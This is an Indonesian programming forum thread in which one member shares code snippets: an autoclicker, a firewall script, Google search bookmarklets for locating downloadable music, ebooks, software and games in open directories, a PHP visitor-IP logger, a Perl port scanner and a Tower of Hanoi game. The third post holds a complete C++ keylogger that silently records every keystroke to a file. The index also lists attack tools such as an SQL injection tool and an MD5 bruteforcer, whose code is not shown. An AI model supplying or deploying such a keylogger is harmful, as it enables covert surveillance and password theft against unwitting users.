Page 1 of 4 1234 LastLast
Results 1 to 15 of 54
http://idgs.in/199759
  1. #1

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default [SHARE & REQUEST]Tempat Khusus Share Code/Snippet Code


    Bagi yang ingin share atau request code program atau potongan program (snippet code) silahkan post disini.


    --Rule khusus--
    untuk Sharing Code/Snippet Code harap memberikan keterangan sebagai berikut :

    • Pemberian note bahasa pemrograman yang digunakan
    • Pemberian credit sumber (Bila ada)
    • Cara Penggunaan/Compile (Bila dirasa perlu/ada cara berbeda dalam mengunakan/compilenya)
    • Kegunaan Code/Snippet Code (Penting!)

    contoh minimal:
    prog lang: javascript
    fungsi : lookup IP publik
    cara penggunaan : copy paste script ke URL form browser

    Code:
    var ip= '<!--#echo var="REMOTE_ADDR"-->';
    document.write("Your IP Address is :"+ip+" ");

    --INDEX--

    C/C++
    Menentukan koordinat mouse+autoklik
    simple keylogger (output default C:\log.txt)
    turnoff monitor (bisa diterapkan untuk remote)
    menambah executable file ke startup
    menambah executable file ke startup (other version)

    Shell Script
    -Windows
    Blocking site (DNS client resolver cache poisoning)

    -Linux/Unix
    bloodiez default iptables rule firewall, nat routing & forwarding

    VBS
    Text to Speech

    Javascript
    mencari file music melalui google dgn javascript (bukan dork)
    mencari ebook melalui google dgn javascript (bukan dork)
    mencari file gambar melalui google dgn javascript (bukan dork)
    mencari aplikasi melalui google dgn javascript (bukan dork)
    mencari games melalui google dgn javascript (bukan dork)
    Game Menara Hanoi
    Youtube autodownload
    Menu Shutdown pada klik kanan

    Java
    Menghitung luas persegi panjang with dialog box
    simple guessing game kertas gunting batu with GUI
    Mencari IP publik server
    simple paint program
    GUI Port Scanner

    Python
    SQLinjection tools
    Gmail account checker
    website structure fingerprinting
    Simple Conficker Scanner in network

    Perl
    Simple port scanning
    Bruteforce MD5 hash

    PHP
    Merekam IP publik pengunjung site kita

    Ruby
    none

    Other
    Last edited by bl00d13z; 30-05-09 at 12:40.

  2. Hot Ad
  3. #2

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : C (snippet)
    Fungsi : Menentukan koordinat mouse+autoklik
    Cara compile : standard C in win32
    platform: Windows
    Credit: LogicKills
    Code:
    #include <windows.h>
    #include <ctime>
    
    int main()
    {
        const int SEC = 20; // put how many seconds you want to click..
        const int CURSOR_X = 200; // x-coordinate of mouse
        const int CURSOR_Y = 144; // y-coordinate of mouse
        
        SetCursorPos(CURSOR_X,CURSOR_Y);
        
        clock_t delay = SEC *CLOCKS_PER_SEC;
        clock_t start = clock();
        while(clock() - start < delay)
        {
           mouse_event(MOUSEEVENTF_LEFTDOWN | MOUSEEVENTF_LEFTUP, 0, 0, 0, 0);
        }
        
        return 0;
    }

  4. #3

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : C++ (snippet)
    Fungsi : simple keylogger (output default C:\log.txt)
    Cara compile : standard C in win32
    platform: Windows

    Spoiler untuk code :

    #include <windows.h>
    #include <Winuser.h>
    #include <string>
    #include <fstream>


    std::string GetKey(int Key)
    {
    std::string KeyString = "";

    if (Key == 8)
    KeyString = "[delete]";
    else if (Key == 13)
    KeyString = "\n";
    else if (Key == 32)
    KeyString = " ";
    else if (Key == VK_PAUSE)
    KeyString = "[PAUSE]";
    else if (Key == VK_CAPITAL)
    KeyString = "[CAPITAL]";
    else if (Key == VK_SHIFT)
    KeyString = "[SHIFT]";
    else if (Key == VK_TAB)
    KeyString = "[TABULATOR]";
    else if (Key == VK_CONTROL)
    KeyString = "[CTRL]";
    else if (Key == VK_ESCAPE)
    KeyString = "[ESCAPE]";
    else if (Key == VK_END)
    KeyString = "[END]";
    else if (Key == VK_HOME)
    KeyString = "[HOME]";
    else if (Key == VK_LEFT)
    KeyString = "[left]";
    else if (Key == VK_RIGHT)
    KeyString = "[right]";
    else if (Key == VK_UP)
    KeyString = "[UP]";
    else if (Key == VK_DOWN)
    KeyString = "[DOWN]";
    else if (Key == VK_SNAPSHOT)
    KeyString = "[SNAPSHOT]";
    else if (Key == VK_NUMLOCK)
    KeyString = "[NUMLOCK]";
    else if (Key == 190 || Key == 110)
    KeyString = ".";
    else if (Key >=96 && Key <= 105)
    KeyString = Key-48;
    else if (Key > 47 && Key < 60)
    KeyString = Key;
    if (Key != VK_LBUTTON || Key != VK_RBUTTON)
    {
    if (Key > 64 && Key < 91)
    {
    if (GetKeyState(VK_CAPITAL))
    KeyString = Key;
    else
    {
    Key = Key + 32;
    KeyString = Key;
    }
    }
    }

    return KeyString;
    }

    int main()
    {
    std::string Filename = "C:\\log.txt";
    std::string TempString = "";
    std::fstream FStream;
    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

    while(true)
    {

    Sleep(5);

    for(int i = 8; i < 191; i++)
    {
    if(GetAsyncKeyState(i)&1 ==1)
    {
    TempString = GetKey (i);

    FStream.write(TempString.c_str(), TempString.size());
    FStream.close();
    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
    }
    }
    }
    }
    Last edited by bl00d13z; 24-05-09 at 07:33.

  5. #4

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : C (snippet)
    Fungsi : turnoff monitor (bisa diterapkan untuk remote)
    Cara compile : standard C in win32
    platform: Windows

    Code:
    #include <windows.h>
    #include <ctime>
    
    int main()
    {
     
      int seconds = 10; //Change time delay here
      clock_t delay = seconds *CLOCKS_PER_SEC;
      clock_t start = clock();
      while(clock() - start < delay){
      SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);}
      SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
        return 0;
    }

  6. #5

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : linux bash script
    Fungsi : bloodiez default iptables rule firewall, nat routing & forwarding
    Cara menggunakan : save dgn ekstensi .sh -> ubah perimission file "chmod 775 atau 777" jalankan dalam direktori file disimpan "./namefile" tanpa petik, dimana [namefile] = terserah
    platform: Linux

    Spoiler untuk Code :

    #!/bin/sh
    #Set variable
    IPT=/sbin/iptables
    MAILSER=192.168.1.1
    #Load module
    modprobe ip_conntrack
    modprobe ip_conntrack_ftp
    #clear and flush rule
    $IPT -F
    $IPT -X
    #Set default policy
    $IPT -P INPUT DROP
    $IPT -P FORWARD DROP
    $IPT -P OUTPUT DROP
    #Set input chain
    $IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    $IPT -A INPUT -p tcp --dport 22 -j LOG --log-level 5 --log-prefix "IPTABLES:"
    $IPT -A INPUT -p tcp -d $MAILSER --dport 22 -j ACCEPT
    $IPT -A INPUT -p tcp -d $MAILSER --dport 80 -j ACCEPT
    $IPT -A INPUT -p udp --dport 53 -j ACCEPT
    $IPT -A INPUT -i lo -j ACCEPT
    $IPT -A INPUT -p tcp -d $MAILSER --dport 25 -j ACCEPT
    $IPT -A INPUT -p tcp -d $MAILSER --dport 110 -j ACCEPT
    $IPT -A INPUT -p tcp -d $MAILSER --dport 143 -j ACCEPT
    #Set output chain
    $IPT -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    $IPT -A OUTPUT -p udp --sport 53 -j ACCEPT
    $IPT -A OUTPUT -o lo -j ACCEPT
    $IPT -A OUTPUT -p tcp --sport 25 -j ACCEPT
    $IPT -A OUTPUT -p tcp --sport 110 -j ACCEPT
    $IPT -A OUTPUT -p tcp --sport 143 -j ACCEPT
    #Set forward chain
    $IPT -A POSTROUTING -t nat -s 192.168.0.0/24 -o eth0 -j MASQUERADE
    $IPT -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    $IPT -A FORWARD -s 192.168.0.0/24 -j ACCEPT
    #4444/445/69/135/139
    iptables -A FORWARD -p tcp --dport 4444 -j DROP
    iptables -A FORWARD -p udp --dport 4444 -j DROP
    #
    iptables -A FORWARD -p tcp --dport 445 -j DROP
    iptables -A FORWARD -p udp --dport 445 -j DROP
    #
    iptables -A FORWARD -p tcp --dport 69 -j DROP
    iptables -A FORWARD -p udp --dport 69 -j DROP
    #
    iptables -A FORWARD -p tcp --dport 135 -j DROP
    iptables -A FORWARD -p udp --dport 135 -j DROP
    #
    iptables -A FORWARD -p tcp --dport 139 -j DROP
    iptables -A FORWARD -p udp --dport 139 -j DROP
    #
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #echo finish messages
    echo "finish !!!"
    Last edited by bl00d13z; 24-05-09 at 07:34.

  7. #6

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Javascript
    Fungsi : mencari file music melalui google dgn javascript (bukan dork)
    Cara menggunakan : Cukup Copy paste script ke URL form pada browser, jgn lupa mematikan addon yg sifatnya blocking javascript
    platform: All


    Code:
    javascript:Qr='';if(!Qr){void(Qr=prompt('Masukin Nama Artis atau judul Lagunya:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
    Last edited by bl00d13z; 23-05-09 at 15:58.

  8. #7

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Javascript
    Fungsi : mencari ebook melalui google dgn javascript (bukan dork)
    Cara menggunakan : Cukup Copy paste script ke URL form pada browser, jgn lupa mematikan addon yg sifatnya blocking javascript
    platform: All


    Code:
    javascript:Qr='';if(!Qr){void(Qr=prompt('Masukin Pengarang atau Judul Bukunya:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

  9. #8

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Javascript
    Fungsi : mencari gambar melalui google dgn javascript (bukan dork)
    Cara menggunakan : Cukup Copy paste script ke URL form pada browser, jgn lupa mematikan addon yg sifatnya blocking javascript
    platform: All

    Code:
    javascript:Qr='';if(!Qr){void(Qr=prompt('Masukin Nama Gambar:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

  10. #9

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Javascript
    Fungsi : mencari aplikasi melalui google dgn javascript (bukan dork)
    Cara menggunakan : Cukup Copy paste script ke URL form pada browser, jgn lupa mematikan addon yg sifatnya blocking javascript
    platform: All

    Code:
    javascript:Qr='';if(!Qr){void(Qr=prompt('Masukin Nama Aplikasinya:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+exe+OR+rar+OR+zip+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

  11. #10

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Javascript
    Fungsi : mencari Games melalui google dgn javascript (bukan dork)
    Cara menggunakan : Cukup Copy paste script ke URL form pada browser, jgn lupa mematikan addon yg sifatnya blocking javascript
    platform: All

    Code:
    javascript:Qr='';if(!Qr){void(Qr=prompt('Masukan Nama Game:',''))};if(Qr)
    location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%
    22+exe+OR+iso+OR+rar+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

  12. #11

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : PHP
    Fungsi : Merekam IP publik pengunjung site kita
    Cara menggunakan : Save dgn ekstensi .php dan upload ke site hostingan kita
    platform: All

    Code:
    <?php
    $logfile= 'hasil.html';
    $IP = $_SERVER['REMOTE_ADDR'];
    $logdetails=  date("F j, Y, g:i a") . ': ' . '<a href=http://www.dnsstuff.com/tools/ipall.ch?domain='.$_SERVER['REMOTE_ADDR'].'>'.$_SERVER['REMOTE_ADDR'].'</a>';
    $fp = fopen($logfile, "a"); 
    fwrite($fp, $logdetails);
    fwrite($fp, "<br>");
    fclose($fp); 
    ?>
    Default Output file log: hasil.html

  13. #12

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Perl
    Fungsi : Simple port scanning
    platform: All
    Cara menggunakan : Save dgn ekstensi .pl eksekusi dengan perintah :
    Code:
    perl namefile.pl <IP target> <port awal> <port akhir>
    contoh :
    Code:
    perl Scanningport.pl 192.168.1.1 1 1024
    Screenshot:


    Code:
    #!/usr/bin/perl
    use IO::Socket::INET;
    if (!defined($ARGV[2])) {
    print 'usage: <target> <port awal> <port akhir>';}
    for ($x=$ARGV[1];$x<$ARGV[2]+1;$x++){
    if (fork()){if ($sock = new IO::Socket::INET(
    PeerAddr=>$ARGV[0],PeerPort=>$x,Proto=>'tcp'))
    { print"$x\tOPEN\n";}else{print"$x\tCLOSED\n";}
    close($sock);exit;}}
    Last edited by bl00d13z; 28-05-09 at 00:52.

  14. #13

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Javascript in html
    Fungsi : Game Menara Hanoi
    platform: All
    Cara menggunakan : Save dgn ekstensi .html buka dengan menggunakan browser


    Spoiler untuk code :

    <html>
    <head>
    <title>Tower of Hanoi DHTML game</title>
    <style type="text/css">
    table {font:bold 13px Verdana}
    p {font:normal 11px Tahoma,Verdana}
    input, select {font:normal 12px Tahoma,Verdana}
    select {width:40px}
    a {font-weight:bold}
    .tower {position:absolute;visibility:visible;left:77px;to p:184px;font:bold 10px Tahoma}
    .container {position:absolute;visibility:visible;}
    .towervert {position:absolute;visibility:visible;border:1px solid black;background-color:black}
    .towerhoriz {position:absolute;visibility:visible;border:1px solid black;font-size:1px;background-color:black}
    .disk {position:absolute;visibility:visible;border:1px solid black}
    </style>
    <script type="text/javascript">

    /***********************************************
    * Tower of Hanoi- by Glenn G. Vergara ([email protected])
    * This notice must stay intact for use
    * Visit Dynamic Drive (http://www.dynamicdrive.com/) for full source code
    ***********************************************/

    var delay = 200; //in milliseconds

    var drag=false;
    var objDisk=null;
    var x = 0;
    var y = 0;
    var disksOnTower1 = new Array(null,null,null,null,null,null,null,null);
    var disksOnTower2 = new Array(null,null,null,null,null,null,null,null);
    var disksOnTower3 = new Array(null,null,null,null,null,null,null,null);
    var disksOnTowers = new Array(disksOnTower1,disksOnTower2,disksOnTower3);
    var offsetleft = 30;
    var offsettop = 30;
    var offsettower = 20;
    var offsethoriz = 30;
    var basetop = 0;
    var diskheight = 0;
    var midhoriztower = 0;
    var indexTo=1;
    var indexFr=1;
    var movectr=0;
    var gameOver=false;
    var prevIndex=0;
    var zindex = 0;
    var currTower=1;
    var prevTower=1;
    var demo=false;
    var arrFr = new Array(255);
    var arrTo = new Array(255);
    var idx = 0;
    var pos = 0;
    var t=null;
    var stop=false;


    function init(){
    if (document.getElementById){
    var diskno = document.hanoi.diskno;
    diskno.options.selectedIndex = 0;
    drawTowers();
    drawDisks(parseInt(diskno.options[diskno.options.selectedIndex].text));
    }
    }

    function initVars(){
    for (var i=0;i<disksOnTower1.length;i++){
    disksOnTower1[i]=null;
    disksOnTower2[i]=null;
    disksOnTower3[i]=null;
    }
    drag = false;
    indexTo = 1;
    indexFr = 1;
    movectr = 0;
    zindex = 0;
    idx = 0;
    pos = 0;
    t = null;
    gameOver=false;
    stop=false;
    demo=false;
    document.hanoi.btnUndo.disabled=true;
    }

    function drawTowers(){
    var title=document.getElementById("title");
    var tower1=document.getElementById("tower1");
    var tower2=document.getElementById("tower2");
    var tower3=document.getElementById("tower3");
    var settings=document.getElementById("settings");
    var titlewidth = parseInt(title.style.width);
    var titleheight = parseInt(title.style.height);
    var towerwidth = parseInt(tower1.style.width);
    var towerheight = parseInt(tower1.style.height);
    var settingswidth = parseInt(settings.style.width);
    midhoriztower = parseInt(document.getElementById("horiztower1").st yle.width)/2;
    diskheight = parseInt(document.getElementById("disk1").style.he ight);

    title.style.left=offsetleft+(1.5*towerwidth)+offse ttower-(titlewidth/2)+"px";
    title.style.top=offsettop+"px";
    tower1.style.left=offsetleft+"px";
    tower1.style.top=offsettop+titleheight+offsethoriz +"px";
    tower2.style.left=offsetleft+towerwidth+offsettowe r+"px";
    tower2.style.top=offsettop+titleheight+offsethoriz +"px";
    tower3.style.left=offsetleft+(towerwidth+offsettow er)*2+"px";
    tower3.style.top=offsettop+titleheight+offsethoriz +"px";
    settings.style.left=offsetleft+(1.5*towerwidth)+of fsettower-(settingswidth/2)+"px";
    settings.style.top=parseInt(tower1.style.top)+towe rheight+offsethoriz+"px";
    }

    function drawDisks(disknum){
    var tower1=document.getElementById("tower1");
    var disktop = parseInt(tower1.style.top)+parseInt(document.getEl ementById("horiztower1").style.top);
    var lefttower1 = parseInt(tower1.style.left);
    var disk;
    var f=document.hanoi;
    basetop = disktop;
    for (var i=disksOnTower1.length;i>=1;i--){
    disk = document.getElementById("disk"+i);
    disk.style.zIndex=++zindex;
    if (i<=disknum){
    disk.style.left=lefttower1+midhoriztower-parseInt(disk.style.width)/2+"px";
    disk.style.top=disktop-diskheight-1+"px";
    disktop = parseInt(disk.style.top);
    disksOnTowers[0][i-1]=disk;
    }
    else {
    disk.style.left="-250px";
    disk.style.top="-250px";
    disksOnTowers[0][i-1]=null;
    }
    }
    f.minmove.value=f.diskno.options[f.diskno.options.selectedIndex].value;
    f.yourmove.value=0;
    }

    function newGame(obj){
    if (movectr>0 && !gameOver && !stop){
    if (confirm("Current game will be aborted, would you like to continue?")){
    initVars();
    drawDisks(parseInt(obj.options[obj.options.selectedIndex].text));
    }
    else document.hanoi.diskno.options.selectedIndex=prevIn dex;
    }
    else {
    initVars();
    drawDisks(parseInt(obj.options[obj.options.selectedIndex].text));
    }
    }

    function initializeDrag(disk,e){
    if (!e) e=event;
    if (stop){
    alert("You cannot continue solving the puzzle after clicking the 'Stop' button.\nClick 'Restart' button or select no. of disks to continue playing.");
    return;
    }
    indexFr = indexTo;
    if (disk.id!=disksOnTowers[indexFr-1][0].id || gameOver || demo) return;
    objDisk=disk;
    x=e.clientX;
    y=e.clientY;
    tempx=parseInt(disk.style.left);
    tempy=parseInt(disk.style.top);
    document.onmousemove=dragDisk;
    }

    function dragDisk(e){
    if (!e) e=event;
    zindex++;
    drag=true;
    var posX = tempx+e.clientX-x;
    var posY = tempy+e.clientY-y;
    var objTower1 = document.getElementById("tower1");
    var objTower2 = document.getElementById("tower2");
    var objTower3 = document.getElementById("tower3");
    var tower1Left = parseInt(objTower1.style.left);
    var tower2Left = parseInt(objTower2.style.left);
    var tower3Left = parseInt(objTower3.style.left);
    var tower3Width = parseInt(objTower3.style.width);

    objDisk.style.zIndex=zindex;
    objDisk.style.left=posX+'px';
    objDisk.style.top=posY+'px';

    if (e.clientX>=document.body.clientWidth-10 || e.clientY>=document.body.clientHeight-5 || e.clientX==5 || e.clientY==5){ //outside available window
    indexTo=indexFr;
    dropDisk(objDisk);
    }
    else if ( //in the vicinity of tower 3
    (tower3Left<=posX) &&
    (tower3Left+tower3Width>=posX) &&
    (parseInt(objTower3.style.top)+parseInt(objTower3. style.height)>posY)
    ){
    indexTo=3;
    }
    else if ((tower2Left<=posX) && (tower2Left+tower3Width>=posX)){ //in the vicinity of tower 2
    indexTo=2;
    }
    else if ((tower1Left<=posX) && (tower1Left+parseInt(objTower1.style.width)>=posX) ){ //in the vicinity of tower 1
    indexTo=1;
    }
    else indexTo = indexFr;
    return false;
    }

    function dropDisk(disk){
    var f=document.hanoi;
    document.onmousemove=new Function("return false");
    if (!drag) return;
    var gameStatus=false;
    var topDisk = disksOnTowers[indexTo-1][0];
    if (indexFr==indexTo){
    getNewTop(indexFr,null);
    pushDisk(disk,indexFr); //put disk back to original tower
    getNewTop(indexFr,disk);
    }
    else if (topDisk==null) {
    pushDisk(disk,indexTo);
    getNewTop(indexFr,null);
    getNewTop(indexTo,disk);
    movectr++;
    currTower=indexTo;
    prevTower=indexFr;
    f.btnUndo.disabled=false;
    }
    else if (parseInt(disk.style.width)<parseInt(topDisk.style .width)){
    pushDisk(disk,indexTo);
    getNewTop(indexFr,null);
    getNewTop(indexTo,disk);
    movectr++;
    currTower=indexTo;
    prevTower=indexFr;
    if (indexTo==3) gameStatus=checkStatus();
    f.btnUndo.disabled=false;
    }
    else {
    getNewTop(indexFr,null);
    pushDisk(disk,indexFr); //put disk back to original tower
    getNewTop(indexFr,disk);
    }

    drag=false;
    f.yourmove.value=movectr;
    if (gameStatus) {
    f.btnUndo.disabled=true;
    minmove = parseInt(f.minmove.value);
    if (movectr==minmove) msg="\nselamat anda berhasil dalam "+minmove+" pindahan."
    else if (movectr>minmove) msg="\kamu sebenere bisa lebih cepat lagi cobalah."
    else msg="";
    alert("Game Over !!!"+msg);
    gameOver=true;
    }
    return;
    }

    function checkStatus(){
    var gameStat = false;
    var disks=0;
    for (var i=0;i<disksOnTower3.length;i++){
    if (disksOnTowers[2][i]!=null) disks++;
    }
    if (disks==parseInt(document.hanoi.diskno.options[document.hanoi.diskno.options.selectedIndex].text)) gameStat=true;
    return gameStat;
    }

    function pushDisk(disk,index){
    var diskWidth = parseInt(disk.style.width);
    var towerLeft = parseInt(document.getElementById("tower"+index).st yle.left);
    var topDisk = disksOnTowers[index-1][0];
    if (topDisk!=null){
    topDiskWidth = parseInt(topDisk.style.width);
    topDiskTop = parseInt(topDisk.style.top);
    disk.style.left=towerLeft+midhoriztower-diskWidth/2+"px";
    disk.style.top=topDiskTop-diskheight-1+"px";
    }
    else {
    disk.style.left=towerLeft+midhoriztower-diskWidth/2+"px";
    disk.style.top=basetop-diskheight-1+"px";
    }
    }

    function getNewTop(index,disk){
    if (disk==null){ //pop
    for (var i=0;i<disksOnTower1.length-1;i++){
    disksOnTowers[index-1][i]=disksOnTowers[index-1][i+1];
    }
    disksOnTowers[index-1][disksOnTower1.length-1]=null;
    }
    else { //push
    for (var i=disksOnTower1.length-1;i>=1;i--){
    disksOnTowers[index-1][i]=disksOnTowers[index-1][i-1];
    }
    disksOnTowers[index-1][0]=disk;
    }
    }

    function solve(btn){
    if (btn.value=="Solve"){
    if (movectr>0 && !gameOver && !stop)
    if (!confirm("Current game will be aborted, would you like to continue?")) return;
    btn.value="Stop";
    initVars();
    stop=false;
    demo=true;
    var f=document.hanoi;
    f.btnIns.disabled=true;
    f.btnRes.disabled=true;
    f.btnUndo.disabled=true;
    disknum = parseInt(f.diskno.options[f.diskno.options.selectedIndex].text);
    drawDisks(disknum);
    getMoves(0, 2, 1, disknum);
    t=window.setTimeout("moveDisk()",delay);
    }
    else {
    if (t) {
    window.clearTimeout(t);
    btn.value="Solve";
    frm.btnIns.disabled=false;
    frm.btnRes.disabled=false;
    t = null;
    stop=true;
    demo=false;
    }

    }
    }

    function moveDisk(){
    frm = document.hanoi;
    disk=disksOnTowers[arrFr[pos]][0];
    pushDisk(disk,arrTo[pos]+1);
    getNewTop(arrFr[pos]+1,null);
    getNewTop(arrTo[pos]+1,disk);
    movectr++;
    frm.yourmove.value=movectr;
    pos++;
    if (movectr<parseInt(frm.minmove.value)) t=window.setTimeout("moveDisk()",delay);
    else {
    alert("Can you do that in "+movectr+" moves?");
    gameOver=true;
    stop=false;
    frm.btnSolve.value="Solve";
    frm.btnIns.disabled=false;
    frm.btnRes.disabled=false;
    }
    }

    function getMoves(from,to,empty,numDisk){
    if (numDisk > 1) {
    getMoves(from, empty, to, numDisk - 1);
    arrFr[idx] = from;
    arrTo[idx++] = to;
    getMoves(empty, to, from, numDisk - 1);
    }
    else {
    arrFr[idx] = from;
    arrTo[idx++] = to;
    }
    }


    function unDo(btn){
    disk=disksOnTowers[currTower-1][0];
    pushDisk(disk,prevTower);
    getNewTop(currTower,null);
    getNewTop(prevTower,disk);
    movectr--;
    document.hanoi.yourmove.value=movectr;
    btn.disabled=true;
    }

    function displayIns(){
    var msg="Coba pindahkan ring dari menara1 ke menara 3\n";
    msg+="Tapi kayaknya kamu gak bisa deh\n";
    msg+="Aturannya: Jangan meletakkan ring yang kecil dibawah yang besar.";
    alert(msg);
    }
    </script>
    </head>
    <body onload="init();" onselectstart="return false" oncontextmenu="return false">
    <form name="hanoi">

    <div id="title" style="position:absolute;visibility:visible;left:-250px;top:-250px;width:160px;height:20px;font:bold 20px Tahoma;text-align:center;">Menara Hanoi</div>

    <div id="tower1" class="container" style="left:-250px;top:-250px;width:200px;height:200px" onmousemove="indexTo=1">
    <div id="verttower1" class="towervert" style="left:99px;top:10px;width:3px;height:170px"> </div>
    <div id="horiztower1" class="towerhoriz" style="left:0px;top:180px;width:200px;height:2px"> </div>
    <div class="tower">MENARA 1</div>
    </div>

    <div id="tower2" class="container" style="left:-250px;top:-250px;width:200px;height:200px" onmousemove="indexTo=2">
    <div id="verttower2" class="towervert" style="left:99px;top:10px;width:3px;height:170px"> </div>
    <div id="horiztower2" class="towerhoriz" style="left:0px;top:180px;width:200px;height:2px"> </div>
    <div class="tower">MENARA 2</div>
    </div>

    <div id="tower3" class="container" style="left:-250px;top:-250px;width:200px;height:200px" onmousemove="indexTo=3">
    <div id="verttower3" class="towervert" style="left:99px;top:10px;width:3px;height:170px"> </div>
    <div id="horiztower3" class="towerhoriz" style="left:0px;top:180px;width:200px;height:2px"> </div>
    <div class="tower">MENARA 3</div>
    </div>

    <div id="disk1" class="disk" style="left:-250px;top:-250px;width:20px;height:19px;background-colorink" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 1"></div>
    <div id="disk2" class="disk" style="left:-250px;top:-250px;width:40px;height:19px;background-color:violet" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 2"></div>
    <div id="disk3" class="disk" style="left:-250px;top:-250px;width:60px;height:19px;background-color:indigo" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 3"></div>
    <div id="disk4" class="disk" style="left:-250px;top:-250px;width:90px;height:19px;background-color:blue" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 4"></div>
    <div id="disk5" class="disk" style="left:-250px;top:-250px;width:100px;height:19px;background-color:green" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 5"></div>
    <div id="disk6" class="disk" style="left:-250px;top:-250px;width:120px;height:19px;background-color:yellow" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 6"></div>
    <div id="disk7" class="disk" style="left:-250px;top:-250px;width:140px;height:19px;background-colorrange" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 7"></div>
    <div id="disk8" class="disk" style="left:-250px;top:-250px;width:160px;height:19px;background-color:red" onmousedown="initializeDrag(this,event)" onmouseup="dropDisk(this)" title="Disk 8"></div>

    <div id="settings" class="container" style="left:-250px;top:-250px;width:260px;">
    <table>
    <tr><td>Jumlah ring yang anda gunakan</td>
    <td>
    <select name="diskno" onchange="newGame(this)" onclick="prevIndex=this.options.selectedIndex">
    <option value="7" selected>3</option>
    <option value="15">4</option>
    <option value="31">5</option>
    <option value="63">6</option>
    <option value="127">7</option>
    <option value="255">8</option>
    </select>
    </td></tr>
    <tr><td>Jumlah Pemindahan Minimum&nbsp;&nbsp;</td>
    <td><input name="minmove" style="border:none" size="3" value="255" readonly="readonly" /></td></tr>
    <tr><td>Anda memindah sejumlah</td>
    <td><input name="yourmove" style="border:none" size="3" value="0" readonly="readonly" /></td></tr>
    <tr><td colspan="2" align="center">
    <input type="button" name="btnIns" value="Instructions" onclick="displayIns()" />
    <input type="button" name="btnRes" value="Restart" onclick="newGame(document.hanoi.diskno)" />
    <input type="button" name="btnUndo" value="Undo" onclick="unDo(this)" disabled="disabled" />
    <input type="button" name="btnSolve" value="Solve" onclick="solve(this)" />
    </td></tr>
    </table>
    <p>&nbsp;</p>
    </div>
    </form>
    </body>
    </html>

  15. #14

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Java
    Fungsi : aplikasi untuk menghitung luas persegi panjang menggunakan java, aplikasi ini dibuat dengan menggunakan Absolute layout dan memiliki penampilan dialog, disini juga ditunjukkan bagaimana agar frame yang telah kita buat berada ditengah layar monitor, juga demo penggunaan try/catch.
    platform: All
